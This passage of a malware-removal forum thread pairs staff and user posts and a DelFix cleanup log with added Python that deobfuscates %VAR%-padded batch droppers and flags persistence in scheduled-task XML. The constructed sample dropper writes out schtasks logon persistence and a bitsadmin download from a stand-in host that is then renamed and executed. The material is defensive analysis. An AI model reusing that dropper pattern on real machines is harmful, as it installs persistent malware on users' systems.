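The two droppers that the fix typed out above (OeYgZvEuU and YaOYcLIZDWQaa) are padded with references to environment variables that are never defined. cmd.exe expands every %NAME% on a batch line once, left to right, before running it, and in a .bat file an undefined name expands to nothing, so `sc%onsVyuBYmaY%htasks` runs as `schtasks` and `set wEaOyyaOAMI%gAyAEY%=%RaNdom%%RAndoM%` defines a variable named wEaOyyaOAMI. The Python below is an added example, not code from the thread or from FRST: it performs that expansion, tracks `set` assignments so the %RANDOM%-named executable can be followed through the rename and the final `cmd /c`, and then flags the schtasks persistence and the download. The `/TRANSFER <job> /DOWNLOAD /PRIORITY` switches are bitsadmin.exe's, which is why the renamed AAfuIkYhYoa.exe still reads as the downloader. The sample script is constructed to mirror the Fixlog's droppers; the user name, the short padding names and the example.invalid URL are made up, while oieMmex and XASormJT.bat are the names the thread starter reported.

```python
"""Undo the %UNDEFINED% padding used by the batch droppers in the Fixlog.

cmd.exe expands every %NAME% on a batch line in a single left-to-right pass
before the line runs. In a .bat file a NAME that is not defined expands to
nothing, so "sc%onsVyuBYmaY%htasks" is executed as "schtasks". Defined names
(%RANDOM%, and anything the script itself sets) are substituted normally.
"""
import re

_REF = re.compile(r"%([^%]*)%")                                # one %NAME% reference; "%%" escapes "%"
_SET = re.compile(r"^\s*set\s+([^=]+)=(.*)$", re.IGNORECASE)   # plain "set NAME=VALUE" only


def expand_line(line, env):
    """Expand one batch line as cmd.exe does for a .bat file.

    env maps lower-cased names to values. %RANDOM% becomes the placeholder
    <RANDOM> so output is deterministic (cmd would substitute a number).
    """
    def sub(m):
        name = m.group(1)
        if name == "":
            return "%"
        key = name.lower()
        if key == "random":
            return "<RANDOM>"
        return env.get(key, "")        # undefined name -> nothing: the padding trick
    return _REF.sub(sub, line)


def deobfuscate(script, env=None):
    """Return the expanded lines of a script, tracking 'set' assignments.

    'set' is parsed after expansion because cmd expands the whole line first:
    "set wEaOy%gAy%=%RANDOM%" defines wEaOy, not wEaOy%gAy%.
    """
    env = {} if env is None else dict(env)
    out = []
    for raw in script.splitlines():
        line = expand_line(raw, env)
        m = _SET.match(line)
        if m:
            env[m.group(1).strip().lower()] = m.group(2)
        out.append(line)
    return out


_URL = re.compile(r"https?://\S+", re.IGNORECASE)
_TN = re.compile(r'/tn\s+"?([^"\s]+)', re.IGNORECASE)


def find_indicators(lines):
    """Flag the persistence and download steps in expanded lines.

    The /TRANSFER <job> /DOWNLOAD /PRIORITY <p> <url> <dest> switches are
    bitsadmin.exe's, so they identify the downloader even when the binary
    has been copied under a random name, as AAfuIkYhYoa.exe in the Fixlog.
    Returns (line number, tag, detail) tuples.
    """
    found = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        if "schtasks" in low and "/create" in low:
            m = _TN.search(line)
            found.append((n, "scheduled_task", m.group(1) if m else ""))
        if "/transfer" in low and "/download" in low:
            m = _URL.search(line)
            found.append((n, "bits_download", m.group(0) if m else ""))
        if low.lstrip().startswith("rename ") and low.rstrip().endswith(".exe"):
            found.append((n, "rename_to_exe", line.split()[-1]))
    return found


# Constructed sample modelled on the Fixlog's droppers: the user name, the
# short padding names and the example.invalid URL are made up; the task name
# oieMmex and XASormJT.bat are the ones the thread starter reported.
SAMPLE = r'''@echo off
c%AopQ%opy /y "C:%yIv%\Users\victim\Ap%yVh%pData\Roaming\YaOY" "C:\U%oqf%sers\victim\AppData\Roaming\YaOY.bat"
sc%ons%htasks /create /tn "oie%UUzN%Mmex" /tr "'C:\Progra%EYU%m Files (x86)\XASormJT.bat' " /s%EoS%c ONLOGO%qNWM%N /de%rBP%lay 0003:00 /rl highest /f
set wEaOy%gAy%=%RaNdom%%RAndoM%
"C:\Users\victim\AppData\Local\AAfu.exe" /T%bOB%RaNsFER C%IAc%iXV /doWnlOAD /PrI%Lem%orIty High http://example.invalid/lg0t.zip "C:\Users\victim\AppData\Local\Temp\Ooia.zip"
rename "C:\Users\victim\AppData\Local\Temp\Ooia.zip" %wEaOy%.ex%yrh%e
cmd /c ""C:\Users\victim\AppData\Local\Temp\%wEaOy%.exe" i"'''

if __name__ == "__main__":
    lines = deobfuscate(SAMPLE)
    for n, line in enumerate(lines, 1):
        print(f"{n:2}: {line}")
    for n, tag, detail in find_indicators(lines):
        print(f"line {n}: {tag} -> {detail}")
```

Running the raw lines through `find_indicators` without expanding them first finds nothing, which is the point of the padding: string matching on the file as stored misses both `schtasks` and `/transfer`. Note that the expansion only happens when the file runs as a batch script; in an interactive cmd window an undefined %NAME% is left as typed, so pasting one of these lines at the prompt does not reproduce it.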


#8 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 17 January 2018 - 08:08 AM

Good! Now do you still get the CMD prompts on startup, or did they stop?



#9 Pepsiman22 (Topic Starter)

Posted 17 January 2018 - 05:10 PM

Nah, they stopped. I think I did that with the Task Scheduler, dunno.



#10 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 17 January 2018 - 07:11 PM

You did. I deleted all the tasks launching the infection, and the files associated with it as well.

Were there any other issues to address, or that was it?

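The Fixlog shows why the task was hard to get rid of. Besides the dropper tasks themselves (oieMmex runs XASormJT.bat at logon with `/rl highest`), a task filed under AVAST Software\Gaming mode Task Scheduler recovery carried a list of actions of the form `schtasks.exe /Change /TN "\oieMmex" /ENABLE`, re-enabling the others, and the fix had to remove it along with them. Task definitions live as one XML file per task under C:\Windows\System32\Tasks, so both shapes can be hunted from the files. The Python below is an added example, not part of the thread or of FRST. The three task XML documents are constructed: the real files are UTF-16 with an XML declaration, the exact Command/Arguments split that schtasks produced on this machine is not in the log, and the ScheduledDefrag entry is made up as a negative case.

```python
r"""Flag Task Scheduler definitions shaped like the persistence in the Fixlog.

Windows keeps one XML file per task under C:\Windows\System32\Tasks. Two shapes
are worth hunting for here: a task whose action is a .bat under Program Files
run with RunLevel HighestAvailable, and a benign-looking task whose actions are
"schtasks.exe /Change /TN <name> /ENABLE", turning the dropper tasks back on.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
_REENABLE = re.compile(r'/change\s+/tn\s+"?\\?([^"\s]+)"?.*?/enable', re.IGNORECASE)


def _unquote(s):
    s = s.strip()
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] and s[0] in "\"'" else s


def task_findings(xml_text):
    """Return (tag, detail) findings for one task definition, [] if clean."""
    root = ET.fromstring(xml_text)
    found = []
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = _unquote(ex.findtext("t:Command", "", NS) or "")
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        base = cmd.rsplit("\\", 1)[-1].lower()
        if base in ("schtasks.exe", "schtasks"):
            m = _REENABLE.search(args)
            if m:
                found.append(("reenables_task", m.group(1)))
        elif base.endswith((".bat", ".cmd")):
            found.append(("runs_script", cmd))
    # Run level alone is not suspicious (plenty of legitimate tasks use it);
    # it is recorded only as an aggravating factor on a task already flagged.
    level = (root.findtext(".//t:RunLevel", "", NS) or "").strip()
    if found and level.lower() == "highestavailable":
        found.insert(0, ("highest_runlevel", level))
    return found


def scan_tasks(tasks):
    """tasks: {task name: xml text}. Returns (report, reenabled_by): report
    holds the findings of every flagged task; reenabled_by maps a task name
    to the tasks whose actions switch it back on."""
    report, reenabled_by = {}, {}
    for name, xml_text in tasks.items():
        found = task_findings(xml_text)
        if found:
            report[name] = found
        for tag, detail in found:
            if tag == "reenables_task":
                reenabled_by.setdefault(detail, []).append(name)
    return report, reenabled_by


# Constructed task XML (no declaration; on disk the files are UTF-16 with one).
_DROPPER = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled><Delay>PT3M</Delay></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files (x86)\XASormJT.bat</Command></Exec></Actions>
</Task>'''
_RECOVERY = r'''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author">
    <Exec><Command>schtasks.exe</Command><Arguments>/Change /TN "\dzopercomjhar" /ENABLE</Arguments></Exec>
    <Exec><Command>schtasks.exe</Command><Arguments>/Change /TN "\oieMmex" /ENABLE</Arguments></Exec>
    <Exec><Command>schtasks.exe</Command><Arguments>/Change /TN "\pSER" /ENABLE</Arguments></Exec>
  </Actions>
</Task>'''
_BENIGN = r'''<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>'''
SAMPLE_TASKS = {
    "oieMmex": _DROPPER,
    r"AVAST Software\Gaming mode Task Scheduler recovery": _RECOVERY,
    "ScheduledDefrag": _BENIGN,
}

if __name__ == "__main__":
    report, reenabled_by = scan_tasks(SAMPLE_TASKS)
    for name, found in report.items():
        print(name, found)
    for name, by in reenabled_by.items():
        print(f"{name} is re-enabled by {by}")
```

On a live system, feed `scan_tasks` the files under C:\Windows\System32\Tasks (read with encoding="utf-16", keyed by their path relative to that folder). Anything listed in `reenabled_by` tells you which task to delete first: removing the dropper tasks alone leaves the re-enabler in place to bring them back at the next boot, which is why the fix above removed the recovery task's cache entries together with the dropper files.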


#11 Pepsiman22 (Topic Starter)

Posted 17 January 2018 - 08:36 PM

Not really. That was pretty much it. Thank you Yoan!

...Man, Canadians are the best.



#12 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 18 January 2018 - 07:59 AM

No problem, you're welcome!

...Man, Canadians are the best.


We're too nice, eh? :P

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop;
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Check the following options :
    • Activate UAC;
    • Remove disinfection tools;
    • Create registry backup;
    • Purge system restore;
    • Reset system settings;
  • Once all the options mentioned above are checked, click on Run;
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply;

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives fix exploitable flaws in it, making it more secure and harder for hackers to exploit. In order to do that, you should always install the Security Updates, known as "Important Updates", on your Windows system. These updates are released on the second Tuesday of every month, but some are also released earlier if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.

Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits, which are one of the biggest attack vectors used to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like Secunia PSI and Heimdal Free will scan your system for outdated programs, help you identify them, and update them.

Antivirus, Antimalware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (led by an Antivirus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at a time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and, if you wish, one Anti-Exploit and/or Anti-Ransomware (since ransomware is currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed here (such as Kaspersky and ESET Antivirus products).

Antivirus

Antimalware

Firewall

Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • GlassWire - Has both a free and paid version (with different packages);
  • Windows Firewall Control - Gives you more control over your Windows Firewall;
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it;

Anti-Exploit/Anti-Ransomware

Web Browsers and Web Browsing

Web Browsers could be considered the closest door between malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means installing extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc., and protect you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome and Mozilla Firefox, called uBlock on Opera);
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera);
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser);
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers);
  • uMatrix: For advanced users, a point-and-click matrix-like extension that allows you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera);
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser);
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far fewer chances of getting infected by malware. If, for example, you're not sure whether a website is legitimate, whether a file is safe to download and execute, or whether a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security, to improve your current computer protection setup and also improve your web browsing and computer usage practices:

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back to this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread? :)



#13 Pepsiman22 (Topic Starter)

Posted 18 January 2018 - 01:24 PM

Here!
# DelFix v1.013 - Logfile created 18/01/2018 at 15:19:16

# Updated 17/04/2016 by Xplode
# Username : Franco - POROTA
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\Users\Franco\Desktop\¡Sea fuerte!.png
Deleted : C:\Users\Franco\Downloads\Addition.txt
Deleted : C:\Users\Franco\Downloads\Fixlog.txt
Deleted : C:\Users\Franco\Downloads\FRST.txt
Deleted : C:\Users\Franco\Downloads\FRST64.exe
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #88 [Restore Point Created by FRST | 01/16/2018 21:32:03]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########

Feel free to close it. Thank you ^^


#14 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 18 January 2018 - 01:54 PM

No problem Pepsiman, you're welcome!

Stay safe :)



#15 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 18 January 2018 - 01:55 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.





